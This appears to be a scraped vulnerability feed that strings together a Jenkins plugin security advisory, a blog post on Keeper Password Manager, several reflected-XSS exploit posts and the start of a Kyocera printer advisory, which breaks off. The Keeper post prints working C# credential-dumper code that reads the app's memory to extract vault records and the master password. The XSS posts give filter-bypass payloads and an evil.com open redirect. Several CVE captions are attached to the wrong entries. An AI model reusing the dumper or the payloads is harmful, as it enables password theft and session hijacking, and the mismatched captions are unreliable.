A missing permission check in Jenkins mabl Plugin 0.0.46 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Active Directory Plugin
*   Assembla Auth Plugin
*   Benchmark Evaluator Plugin
*   Datadog Plugin
*   ElasticBox CI Plugin
*   External Monitor Job Type Plugin
*   mabl Plugin
*   MathWorks Polyspace Plugin
*   OpenShift Login Plugin
*   Oracle Cloud Infrastructure Compute Plugin
*   Orka by MacStadium Plugin
*   Pipeline restFul API Plugin
*   Rebuilder Plugin
*   SAML Single Sign On(SSO) Plugin
*   Sumologic Publisher Plugin
*   Test Results Aggregator Plugin

**Descriptions****XXE vulnerability in External Monitor Job Type Plugin**

**SECURITY-3133 / CVE-2023-37942**  
**Severity (CVSS):** High  
**Affected plugin: external-monitor-job**  
**Description:**

External Monitor Job Type Plugin 206.v9a\_94ff0b\_4a\_10 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers with Item/Build permission to have Jenkins parse a crafted HTTP request with XML data that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

External Monitor Job Type Plugin 207.v98a\_a\_37a\_85525 disables external entity resolution for its XML parser.

**Password transmitted in plain text by Active Directory Plugin**

**SECURITY-3059 / CVE-2023-37943**  
**Severity (CVSS):** Low  
**Affected plugin: active-directory**  
**Description:**

Active Directory Plugin allows testing a new, unsaved configuration by performing a connection test (the button labeled "Test Domain").

Active Directory Plugin 2.30 and earlier ignores the "Require TLS" and "StartTls" options and always performs the connection test to Active directory unencrypted. This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain Active Directory credentials.

This only affects the connection test. Connections established during the login process are encrypted if the corresponding TLS option is enabled.

Active Directory Plugin 2.30.1 considers the "Require TLS" and "StartTls" options for connection tests.

**Missing permission check in Datadog Plugin allows capturing credentials**

**SECURITY-3130 / CVE-2023-37944**  
**Severity (CVSS):** Medium  
**Affected plugin: datadog**  
**Description:**

Datadog Plugin 5.4.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Datadog Plugin 5.4.2 requires Overall/Administer permission to access the affected HTTP endpoint.

**Missing permission check in SAML Single Sign On(SSO) Plugin**

**SECURITY-3164 / CVE-2023-37945**  
**Severity (CVSS):** Medium  
**Affected plugin: miniorange-saml-sp**  
**Description:**

SAML Single Sign On(SSO) Plugin 2.3.0 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to download a string representation of the current security realm (Java Object#toString()), which potentially includes sensitive information.

SAML Single Sign On(SSO) Plugin 2.3.1 requires Overall/Administer permission to access the affected HTTP endpoint, and only allows downloading a string representation if the current security realm is this plugin’s.

**Session fixation vulnerability in OpenShift Login Plugin**

**SECURITY-2998 / CVE-2023-37946**  
**Severity (CVSS):** High  
**Affected plugin: openshift-login**  
**Description:**

OpenShift Login Plugin 1.1.0.227.v27e08dfb\_1a\_20 and earlier does not invalidate the existing session on login.

This allows attackers to use social engineering techniques to gain administrator access to Jenkins.

OpenShift Login Plugin 1.1.0.230.v5d7030b\_f5432 invalidates the existing session on login.

**Open redirect vulnerability in OpenShift Login Plugin**

**SECURITY-2999 / CVE-2023-37947**  
**Severity (CVSS):** Medium  
**Affected plugin: openshift-login**  
**Description:**

OpenShift Login Plugin 1.1.0.227.v27e08dfb\_1a\_20 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins.

This allows attackers to perform phishing attacks by having users go to a Jenkins URL that will forward them to a different site after successful authentication.

OpenShift Login Plugin 1.1.0.230.v5d7030b\_f5432 only redirects to relative (Jenkins) URLs.

**Missing SSH host key validation in Oracle Cloud Infrastructure Compute Plugin**

**SECURITY-3044 / CVE-2023-37948**  
**Severity (CVSS):** Medium  
**Affected plugin: oracle-cloud-infrastructure-compute**  
**Description:**

Oracle Cloud Infrastructure Compute Plugin 1.0.16 and earlier does not perform SSH host key validation when connecting to OCI clouds.

This lack of validation could be abused using a man-in-the-middle attack to intercept these connections to OCI clouds.

Oracle Cloud Infrastructure Compute Plugin 1.0.17 provides strategies for performing host key validation for administrators to select the one that meets their security needs.

The Jenkins security team has been unable to confirm the exploitability and resolution of this vulnerability.

**Missing permission check in Orka by MacStadium Plugin allows capturing credentials**

**SECURITY-3128 / CVE-2023-37949**  
**Severity (CVSS):** Medium  
**Affected plugin: macstadium-orka**  
**Description:**

Orka by MacStadium Plugin 1.33 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Orka by MacStadium Plugin 1.34 requires Overall/Administer permission to access the affected HTTP endpoint.

**Missing permission check in mabl Plugin allows enumerating credentials IDs**

**SECURITY-3137 (1) / CVE-2023-37950**  
**Severity (CVSS):** Medium  
**Affected plugin: mabl-integration**  
**Description:**

mabl Plugin 0.0.46 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in mabl Plugin 0.0.47 requires the appropriate permissions.

**Exposure of system-scoped credentials in mabl Plugin**

**SECURITY-3137 (2) / CVE-2023-37951**  
**Severity (CVSS):** Medium  
**Affected plugin: mabl-integration**  
**Description:**

mabl Plugin 0.0.46 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration.

This allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.

mabl Plugin 0.0.47 defines the appropriate context for credentials lookup.

**CSRF vulnerability and missing permission checks in mabl Plugin allow capturing credentials**

**SECURITY-3127 / CVE-2023-37952 (CSRF), CVE-2023-37953 (missing permission check)**  
**Severity (CVSS):** High  
**Affected plugin: mabl-integration**  
**Description:**

mabl Plugin 0.0.46 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

mabl Plugin 0.0.47 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**CSRF vulnerability in Rebuilder Plugin**

**SECURITY-3033 / CVE-2023-37954**  
**Severity (CVSS):** Medium  
**Affected plugin: rebuild**  
**Description:**

Rebuilder Plugin 320.v5a\_0933a\_e7d61 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to rebuild a previous build.

**CSRF vulnerability and missing permission check in Test Results Aggregator Plugin**

**SECURITY-3122 / CVE-2023-37955 (CSRF), CVE-2023-37956 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: test-results-aggregator**  
**Description:**

Test Results Aggregator Plugin 1.2.13 and earlier does not perform a permission check in an HTTP endpoint implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.

Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**CSRF vulnerability in Pipeline restFul API Plugin**

**SECURITY-3126 / CVE-2023-37957**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-restful-api**  
**Description:**

Pipeline restFul API Plugin 0.11 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to have Jenkins connect to an attacker-specified URL, capturing a newly generated JCLI token that allows impersonating the victim.

**CSRF vulnerability and missing permission checks in Sumologic Publisher Plugin**

**SECURITY-3117 / CVE-2023-37958 (CSRF), CVE-2023-37959 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: sumologic-publisher**  
**Description:**

Sumologic Publisher Plugin 2.2.1 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Arbitrary file read vulnerability in MathWorks Polyspace Plugin**

**SECURITY-3124 / CVE-2023-37960**  
**Severity (CVSS):** Medium  
**Affected plugin: mathworks-polyspace**  
**Description:**

MathWorks Polyspace Plugin 1.0.5 and earlier does not restrict the path of the attached files in Polyspace Notification post-build step.

This allows attackers with Item/Configure permission to send emails with arbitrary files from the Jenkins controller file system.

**CSRF vulnerability in Assembla Auth Plugin**

**SECURITY-2988 / CVE-2023-37961**  
**Severity (CVSS):** Medium  
**Affected plugin: assembla-auth**  
**Description:**

Assembla Auth Plugin 1.14 and earlier does not implement a state parameter in its OAuth flow, a unique and non-guessable value associated with each authentication request.

This vulnerability allows attackers to trick users into logging in to the attacker’s account.

**CSRF vulnerability and missing permission checks in Benchmark Evaluator Plugin**

**SECURITY-3119 / CVE-2023-37962 (CSRF), CVE-2023-37963 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: benchmark-evaluator**  
**Description:**

Benchmark Evaluator Plugin 1.0.1 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL and to check for the existence of directories, .csv, and .ycsb files on the Jenkins controller file system.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**CSRF vulnerability and missing permission checks in ElasticBox CI Plugin allow capturing credentials**

**SECURITY-3131 / CVE-2023-37964 (CSRF), CVE-2023-37965 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: elasticbox**  
**Description:**

ElasticBox CI Plugin 5.0.1 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Severity**

*   SECURITY-2988: Medium
*   SECURITY-2998: High
*   SECURITY-2999: Medium
*   SECURITY-3033: Medium
*   SECURITY-3044: Medium
*   SECURITY-3059: Low
*   SECURITY-3117: Medium
*   SECURITY-3119: Medium
*   SECURITY-3122: Medium
*   SECURITY-3124: Medium
*   SECURITY-3126: High
*   SECURITY-3127: High
*   SECURITY-3128: Medium
*   SECURITY-3130: Medium
*   SECURITY-3131: Medium
*   SECURITY-3133: High
*   SECURITY-3137 (1): Medium
*   SECURITY-3137 (2): Medium
*   SECURITY-3164: Medium

**Affected Versions**

*   **Active Directory Plugin** up to and including 2.30
*   **Assembla Auth Plugin** up to and including 1.14
*   **Benchmark Evaluator Plugin** up to and including 1.0.1
*   **Datadog Plugin** up to and including 5.4.1
*   **ElasticBox CI Plugin** up to and including 5.0.1
*   **External Monitor Job Type Plugin** up to and including 206.v9a\_94ff0b\_4a\_10
*   **mabl Plugin** up to and including 0.0.46
*   **MathWorks Polyspace Plugin** up to and including 1.0.5
*   **OpenShift Login Plugin** up to and including 1.1.0.227.v27e08dfb\_1a\_20
*   **Oracle Cloud Infrastructure Compute Plugin** up to and including 1.0.16
*   **Orka by MacStadium Plugin** up to and including 1.33
*   **Pipeline restFul API Plugin** up to and including 0.11
*   **Rebuilder Plugin** up to and including 320.v5a\_0933a\_e7d61
*   **SAML Single Sign On(SSO) Plugin** up to and including 2.3.0
*   **Sumologic Publisher Plugin** up to and including 2.2.1
*   **Test Results Aggregator Plugin** up to and including 1.2.13

**Fix**

*   **Active Directory Plugin** should be updated to version 2.30.1
*   **Datadog Plugin** should be updated to version 5.4.2
*   **External Monitor Job Type Plugin** should be updated to version 207.v98a\_a\_37a\_85525
*   **mabl Plugin** should be updated to version 0.0.47
*   **OpenShift Login Plugin** should be updated to version 1.1.0.230.v5d7030b\_f5432
*   **Oracle Cloud Infrastructure Compute Plugin** should be updated to version 1.0.17
*   **Orka by MacStadium Plugin** should be updated to version 1.34
*   **SAML Single Sign On(SSO) Plugin** should be updated to version 2.3.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Assembla Auth Plugin
*   Benchmark Evaluator Plugin
*   ElasticBox CI Plugin
*   MathWorks Polyspace Plugin
*   Pipeline restFul API Plugin
*   Rebuilder Plugin
*   Sumologic Publisher Plugin
*   Test Results Aggregator Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3117, SECURITY-3119, SECURITY-3122, SECURITY-3126, SECURITY-3127, SECURITY-3128, SECURITY-3130, SECURITY-3131
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-3164
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2988, SECURITY-3033, SECURITY-3137 (1)
*   **Kevin Guerroudj, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2998, SECURITY-2999
*   **Tony Torralba (@atorralba), GitHub Security Lab** for SECURITY-3124, SECURITY-3133
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3044, SECURITY-3137 (2)

CVE-2023-37950: Jenkins Security Advisory 2023-07-12

A missing permission check in Jenkins Benchmark Evaluator Plugin 1.0.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL and to check for the existence of directories, `.csv`, and `.ycsb` files on the Jenkins controller file system.

CVE-2023-37963: Jenkins Security Advisory 2023-07-12

Jenkins External Monitor Job Type Plugin 206.v9a_94ff0b_4a_10 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2023-37942: Jenkins Security Advisory 2023-07-12

Jenkins OpenShift Login Plugin 1.1.0.227.v27e08dfb_1a_20 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins, allowing attackers to perform phishing attacks.

CVE-2023-37947: Jenkins Security Advisory 2023-07-12

An issue was discovered in Keeper Password Manager for Desktop version 16.10.2, and the KeeperFill Browser Extensions version 16.5.4, allows local attackers to gain sensitive information via plaintext password storage in memory after the user is already logged in, and may persist after logout.

**It's Not What You Think - It's Worse**

There are a number of password management solutions available to the public. While some have naturally been deprecated due to security concerns or improvements in cryptographic handling. The noteworthy part is that they usually don’t just hand over plain text passwords when asked.

With that piece of foreshadowing, the target for today’s post is a solution quickly growing in popularity even amongst enterprise users: **Keeper Password Manager**

**To Keep or Not To Keep**

To begin I start by installing Keeper Password Manager, creating an account, and creating some fake credential entries. By now I of course notice that the Desktop App was effectively Electron, or a Chromium Embedded Framework (CEF) application.

Now, the lowest hanging fruit thing I can think to attempt. Attach WinDebug to Keeper and use it to search memory for password strings or structures that could map where they are stored. Attempting to search for the credentials in memory very graciously gives them to us in plain text - oh joy.

Now I have an idea of how they are being stored in memory though and the JSON layout. This will prove useful in searching for others, so I used the start of the JSON to search for other entries. There were many - with each having two memory locations.

Now I begin looking for patterns that could help me figure out the mapping or locations these are written to, anything that could act as the equivalent to a V8 string mapping table.

After some searching and comparing a pattern begins to emerge. All the addresses have pointers for them stored at: 0x??fff0020 -> 0x??fff0030

Through further searching I did find that this could vary with the most reliable range being 0x??fff0010 -> 0x??fff1ff0 as the increments of 0x10 each appeared to store a pointer to a different string or value - including the JSON password strings.

**What A Dump ...**

There is a fundamental issue with our the above means of attempting to parse and extract passwords, and that is the JavaScript engine V8. The way in which this engine allocates memory and how it can vary kills any chances we have of relying on this for credential dumping. So upon restarting the target Keeper password manager vault, the pointer locations can vary wildly.

Fortunately, Enoch Wang, Samuel Zurowski, and Tyler Thomas published some research into V8 Memory mapping called Juicing V8 . So thanks to the University of New Haven for the helpful work and resources. Unfortunately, it didn’t help in this case - wether this is the result of Electron or V8 versioning or error on my part I am not sure.

According, to their work and corresponding Volatility Plugin: V8 operates by crating a MetaMap which stores a pointer reference to itself +0x1, this pointer is also present in the Object maps and the pointers for these Object maps are then once again stored in the Object Structures where strings and other data can be found and extracted.

So in theory, one could iterate over memory to find a specific byte pattern, always present at +0x10 bytes after the start of the MetaMap: ff 03 (40 | 20) 00 - at least according to the volatility plugin and the Juicing V8 research work. Sadly this byte pattern is seemingly unreliable and produces inaccurate results in the case of Keeper but it is something that could be built upon in future.

So, with no ‘refined’ means of mapping and parsing the target application’s memory I turned to the biggest hammer I could find for this metaphorical nail: **_RegEx_**

**Witty Expression Cirqa 1951**

To begin I started by constructing the necessary CSharp code.

        public static List<string> stringsList = new List<string>();
        static void Main(string[] args)
        {
            // Iterate over each process id
            foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
            {
                // Get process command line string
                string commandline = GetCommandLine(process);
                // Check if it matches known child process client id that stores credentials
                if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
                {
                    Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                    Console.WriteLine("->Searching...\n");
                    // Get process handle, VM READ and QUERY
                    IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                    // Start address
                    IntPtr address = new IntPtr(0x10000000000);
                    MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                    // Iterate over memory regions
                    while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                    {
                        // Check if memory committed & Type is private
                        if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                        {
                            byte[] buffer = new byte[(int)memInfo.RegionSize];
                            // Read region into buffer the size of memory region.
                            if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                            {
                                string text = Encoding.ASCII.GetString(buffer);
                                extract_credentials(text);
                                extract_master(text);
                                extract_account(text);
                            }
                        }
                        // Increment to next region
                        address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                    }
                    // Close process handle when finished
                    CloseHandle(processHandle);
                }
            }
        }
    

I did spot that **Keeper** almost always starts the password containing child process with --renderer-client-id=5.

This can alter if the target child process crashes and the parent does not terminate, so felt it best to include a check for 7 as well:

        public static string GetCommandLine(this Process process)
        {
            if (process is null || process.Id < 1)
            {
                return "";
            }
            // Construct LINQ query to get process command line
            string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
    
            // Create Object Searcher and get then return command line
            using (var searcher = new ManagementObjectSearcher(query))
            using (var collection = searcher.Get())
            {
                var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
                return managementObject != null ? (string)managementObject["CommandLine"] : "";
            }
        }
    

Moving onto the next step, we need to be able to make all our needed Win32 API calls. To accomodate this I created the necessary DLL Imports.

Also, no I did not go the extra mile and make use of D/Invoke or Syscalls, I have some love for my free time.

We can now make a call to get a handle to the target process with both virtual Memory read and query information permissions. Using this handle we can perform the needed operations to extract potential credential data.

        [DllImport("kernel32.dll")]
        public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
    
        [DllImport("kernel32.dll")]
        public static extern bool CloseHandle(IntPtr hObject);
    
        [DllImport("ntdll.dll")]
        public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);
    
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);
    
        [StructLayout(LayoutKind.Sequential)]
        public struct MEMORY_BASIC_INFORMATION
        {
            public IntPtr BaseAddress;
            public IntPtr AllocationBase;
            public uint AllocationProtect;
            public IntPtr RegionSize;
            public uint State;
            public uint Protect;
            public uint Type;
        }
    

Now finally to incorporate the code to handle extracting the records. Under more surgical conditions we could attempt to precisely determine the length. If we look around near the stored password JSON string we can quickly identify a useful set of bytes. Exactly 8 bytes prior to the password JSON is four bytes that are almost always seemingly 0x00000180 | 384.

If we however create an entry in Keeper that exceeds this length we see it changes to 0x00000400 | 1024

If we compare the base address with this length - 0x1 we can see we perfectly match the padding that surrounds the end of the JSON string object which is always padded with 0x20’s.

However, as discussed before, surgical precision and the V8 MetaMap structures were not reliable during my analysis. So with this in mind we can simply rely on RegEx to grab the appropriate JSON structure. I would like to apologise in advance for the messiest set of Regular Expressions to grace the internet.

        public static void extract_credentials(string text)
        {
            // Index for start of target JSON string
            int index = text.IndexOf("{\"title\":\"");
            // Index for end of JSON string
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    // Create regex statement to match JSON structure
                    Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                    // Use regex to match and convert the match to a string
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
    
                    // Get index of end of the regex match (for cleaning)
                    int match_cut = match.IndexOf("}  ");
                    // if matched
                    if (match_cut != -1 )
                    {
                        // Cut and trim the match to remove duplicates and empty spaces
                        match = match.Substring(0, match_cut + "}  ".Length).TrimEnd();
                        // Compare to string list to check if already extracted
                        if (!stringsList.Contains(match) && match.Length > 20)
                        {
                            Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "}  ".Length) + "\n");
                            stringsList.Add(match);
                        }
    
                    } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match + "\n");
                        stringsList.Add(match.TrimEnd());
                    }
                    index = text.IndexOf("{\"title\":\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
    
            }
        }
    

However, there are crucial bits of data missing here. Keeper stores far more of value in memory than just the vault records. One can find the user account email address in memory using the below.

        public static void extract_account(string text)
        {
            int index = text.IndexOf("{\"expiry\"");
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    if ((match.Length > 2))
                    {
                        Console.WriteLine("->Account Record Found : " + match + "\n");
                        return;
                    }
                    index = text.IndexOf("{\"expiry\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
            }
    
        }
    

Also, while the idea of a master password is great - it is conveniently stored in memory in plain text right next to a recognizable data_key identifier for easy retrieval.

 

An exception to this is SSO logins which instead appear to store a JSON Web Token, in a separate JSON object. Not that anyone has an interest in that, **_wink wink_**.

So I shall apply checks for the master password too, by looking for the data\_key key word and filtering out known useless result patterns.

        public static void extract_master(string text)
        {
            int index = text.IndexOf("data_key");
            int eindex = index + 64;
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(data_key[ -~]+)");
                    var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
                    if (match_one.Replace("data_key", "").Length > 5)
                    {
                        if (!clean.IsMatch(match_one.Replace("data_key", "")))
                        {
                            Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                        }
    
                    }
                    index = text.IndexOf("data_key", index + 1);
                    eindex = index + 64;
                }
                catch
                {
                    return;
                }
    
            }
        }
    

**Burn The Dump**

After debugging and testing my code I have now reached a stable point where it consistently dumps all stored credentials across hosts and installs.

From here it is worth asking, what happens when it signs the user out or if a user deletes a record? Well fear not, it does nothing. Unless you are using an enterprise or SSO sign-in, memory clearing will not be configured by default.

So long as the application and its child processes haven’t been entirely restarted then they are kept nicely in memory. This even applies to if your session ‘times out’, so long as the memory clearing setting hasn’t been manually enabled by the user.

Well surely the browser extension doesn’t suffer from this issue and manages the storage of clear text credentials carefully with clearing of memory and on-demand credential retrieval? No, it really doesn’t. The below is a live MSEDGE browser child process memory which has all the credentials stored in plain text.

For any of those wondering if this is of concern to Keeper please see the attached out-of-scope vulnerability disclosure bullet point.

*   **Bugs that rely on keylogging, compromise of the operating system or privileged access**

Never the less, MITRE has reserved the above issues under **CVE-2023-36266**.

So, in conclusion I can highly recommend Keeper Security and their secure password storage solutions. If you would like to make full use of Keeper’s broad feature set feel free to download my tool from here: **Peeper Password Dumper**

While my tool doesn’t parse and retrieve credentials from browsers, I am sure some smart people out there will have that working soon. Thanks for reading.

CVE-2023-36266: Keeper Security - Dumping Cleartext Passwords

Mastery LMS version 1.2 suffers from a cross site scripting vulnerability.

    # Exploit Title: Mastery LMS 1.2 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/mastery/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /browseGET parameter 'search' is vulnerable to XSShttps://website/browse?search=[XSS]GET parameter 'featured' is vulnerable to XSShttps://website/browse?featured=[XSS]GET parameter 'recommended' is vulnerable to XSShttps://website/browse?recommended=[XSS]GET parameter 'skill' is vulnerable to XSShttps://website/browse?skill=[XSS]Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> XSS Filter Bypass : "><script>alert(1)</script>[-] Done

Mastery LMS 1.2 Cross Site Scripting

Academy LMS version 5.15 suffers from a cross site scripting vulnerability.

    # Exploit Title: Academy LMS 5.15 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /home/coursesGET parameter 'sort_by' is vulnerable to XSShttps://website/home/courses?category=photoshop&price=all&level=all&language=all&rating=all&sort_by=[XSS]Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> XSS Filter Bypass : ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd[-] Done

Academy LMS 5.15 Cross Site Scripting

Articart version 2.0.1 suffers from cross site scripting and open redirection vulnerabilities.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : http://articart-demo.livelyworks.net/                                      ││  Vendor   : livelyworks                                                                ││  Software : Articart 2.0.1                                                             ││  Vuln Type: Reflected XSS - Open Redirect using base64 Encoding                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## RXSSPath: /items/searchGET 'search_term' parameter is vulnerable to RXSShttps://website/items/search?search_term=123zr77l%22%3e%3cscript%3ealert(1)%3c%2fscript%3esadj4## Open RedirectAn Attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool inphishing campaigns, as it allows hiding the malicious webpage behind a linkPath: /change-language/de_DEGET 'redirectTo' parameter is vulnerable to Open Redirect using base64 encodinghttps://website/change-language/de_DE?redirectTo=aHR0cHM6Ly93d3cuZXZpbC5jb20vaHR0cHM6Ly93d3cuZXZpbC5jb20v = https://www.evil.com/[-] Done

Articart 2.0.1 Cross Site Scripting / Open Redirection

Kyocera TASKalfa 4053ci versions 2VG_S000.002.561 and below suffers from path traversal, user enumeration, and denial of service vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230705-0 >  
=======================================================================  
               title: Path traversal bypass & Denial of service  
             product: Kyocera TASKalfa 4053ci printer  
  vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561  
       fixed version: 2VG_S000.002.574  
         CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261  
              impact: High  
            homepage: https://global.kyocera.com  
               found: 2022-12-13  
                  by: Stefan Michlits (Office Vienna)  
                      Gorazd Jank (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Kyocera Document Solutions is leading the digital shift driving productivity  
and growth in the printing industry. We offer a range of exciting new options  
that draw on the combined resources of the Kyocera Group."

Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/

Business recommendation:  
------------------------  
SEC Consult recommends Kyocera customers to install the latest updates.

Furthermore, an in-depth security analysis performed by security professionals  
is highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
